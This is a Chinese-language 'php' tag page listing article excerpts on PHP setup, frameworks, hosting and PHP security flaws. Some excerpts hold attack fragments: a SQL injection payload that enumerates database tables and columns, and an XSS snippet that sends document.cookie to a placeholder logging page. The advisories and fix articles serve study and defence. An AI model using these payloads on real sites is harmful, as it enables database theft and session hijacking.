标签:php
-
win7下PHP运行环境搭建(apache2+mysql+php)”
首先需要下载PHP代码包和Apache与Mysql的安装软件包,并且检测你的iis是否打开了,如果开着就关掉,否则就会起冲突,我直接在控制面扳->程序->打开或关闭window服务哪里把internet信息服务关掉了。...
-
nginx+cgi解析php容易出现的漏洞的分析”
本文简要的分析nginx+cgi解析php容易出现的漏洞...
-
php Help Agent”
###################################################### Author : BeyazKurt# Contact : Djm-sut@Hotmail.Com## Script : php Help Agent (v1.1 Full & 1.0)# Risk : Local File Include# Download : http://sourceforge.net/projects/ph...
-
记一次曲折的php入侵”
闲着无聊就又找了个站来玩玩。随便找了个。点看链接一看php的。。php的就php的吧。反正练习于是就判断是否存在注入点。and 1=1 and 1=2 返回不同。判断数据库是否大于4。0.。大于呵呵。可。。正当高行的时候。却发现无法查询。。以下是代码片段:screen.w...
-
php+mysql5半自动注入工具图文教程”
经常碰到这样的注入环境,但有的时候网上给的工具并不能完全应付所有的环境。比如有的会有过滤啊啥的,为了方便我特意写了这个工具。...
-
php 注入 记录一下”
暴库名\表名\列名 /**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1-- 碰到一个字段暴不出...
-
php disable_functions 函数列表”
虚拟主机配置,建议禁止php函数列表,禁用不安全的PHP函数...
-
asp php XSS获取cookie的代码”
<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> news.asp代码: <% msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath(&q...
-
IIS PHP fastcgi模式 pathinfo取值错误任意代码执行漏洞修复方法”
这篇文章主要介绍了PHP fastcgi模式 pathinfo取值错误任意代码执行漏洞,需要的朋友可以参考下...
-
防止apache的php扩展名解析漏洞”
今天看到ecshop后台拿webshell的文章,想起来很长时间很多版本存在的apache的php扩展名解析漏洞...
-
WikkaWiki 1.3.2 Spam Logging PHP注射的方法”
WikkaWiki 1.3.2 Spam Logging PHP注射的详细方法代码...
-
利用php来嗅探劫持服务器数据”
前几天刺在我们的maillist发了一个老外写的文章,大意是可以用php来实现数据的劫持和转发。我瞄了一下,确实可行,于是今天抽出了以前用来扯淡的时间,写了段代码验证了一下想法。老外的原文是一个PDF,有兴趣看 ......
-
PHP Hash冲突导致 CPU 100%的完全解决方法”
今天抽空研究了一个前不久,出的一个BUG,PHP 5.2/5.3 Hash漏洞,造成一台机器就可以DDOS攻击互联网上的PHP网站...
-
利用php+socket5代理进行内网渗透测试”
在渗透测试中,经常会遇到的情况是拿到了webshell,但是webserver在内网,做的web端口映射对外提供web服务。如果有防护软件 使得服务器权限变态到你无法创建socket代理和端口转发。这时候如果你想对内网web服务进行渗透,你就需要你拿下的这台服务器给你做代理服务。...
-
win10下sublime texts3添加配置运行php代码编译的图文教程”
最近一些朋友反馈说不知道win10下sublime texts3添加配置运行php代码编译的方法;今天小编将为大家带来的是win10下sublime texts3添加配置运行php代码编译的图文教程!有需要的朋友一起去看看吧...
-
放置php博客程序的国内主机推荐”
我从05年底开始写博客到07年10月21日开始固定使用Wordpress,不知不觉已经两年多了。使用独立博客期间,换过很多次空间,从国内搬到国外又搬回国内,不停的折腾。现总结一下希望对选购空间的博友有帮助。注,本文只针对使用php博客程序的朋友。...
-
PHP框架的选择及几款主流框架的性能基本评测”
这篇文章主要介绍了PHP框架的选择及几款主流框架的性能基本评测,文中以简单的hello word程序的运行从负载和响应等各方面分析框架的基本性能,需要的朋友可以参考下...